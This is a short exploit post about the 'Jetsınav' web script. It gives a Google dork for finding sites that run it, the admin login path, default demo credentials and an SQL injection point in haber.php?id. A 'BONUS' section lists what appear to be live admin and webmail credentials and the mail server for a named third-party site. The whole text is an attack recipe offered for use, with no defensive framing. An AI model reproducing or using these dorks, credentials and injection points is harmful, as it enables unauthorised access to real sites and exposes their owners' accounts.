Dork: allintext:"Powered by Jetsınav"
admin panel:/admin/login.php
in script 2 vuln
1)Default Password
2)SQL Injection
Default Password poc:
dork in google search>select site
email: demo@demo.com
pass: demo (or) demox
SQL Injection poc:
select site and search id
ex: haber.php?id=5
no md5 hash no encrypt
BONUS - EXAMPLE
Admin Panel
Panel: https://onlinebasari.com/admin/login.php
E-Mail:demo@demo.com
Şifre:demox
Webmail
Kullanıcı adı: noreply@onlinebasari.com
Şifre: onlinebasari.com
Webmail Panel: https://onlinebasari.com/webmail
Sunucu: https://mail.onlinebasari.com:2080
Port: 2080